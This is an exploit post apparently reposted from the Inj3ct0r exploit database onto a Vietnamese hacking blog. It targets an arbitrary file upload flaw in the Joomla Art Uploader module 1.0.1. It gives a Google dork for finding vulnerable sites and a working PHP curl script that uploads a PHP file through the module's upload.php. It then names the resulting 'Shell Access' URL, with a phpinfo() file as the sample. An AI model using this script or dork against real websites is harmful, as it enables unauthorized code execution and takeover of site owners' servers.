Joomla Modules - Art Uploader Arbitrary File Upload Vulnerability

##################################################
# Description : Joomla Modules - Art Uploader Arbitrary File Upload Vulnerability
# Version : 1.0.1
# Link : http://www.artetics.com/ARTools/art-uploader
# Plugins : http://www.artetics.com/free/joomla/mod_artuploader.zip
# Google Dork : inurl:/modules/mod_artuploader/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php

<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('userfile'=>"@$uploadfile",
'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/modules/mod_artuploader/lo.php

lo.php
<?php
phpinfo();
?>

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking

Joomla Modules - Art Uploader Arbitrary File Upload Vulnerability

Chú Ý:

Bài đăng phổ biến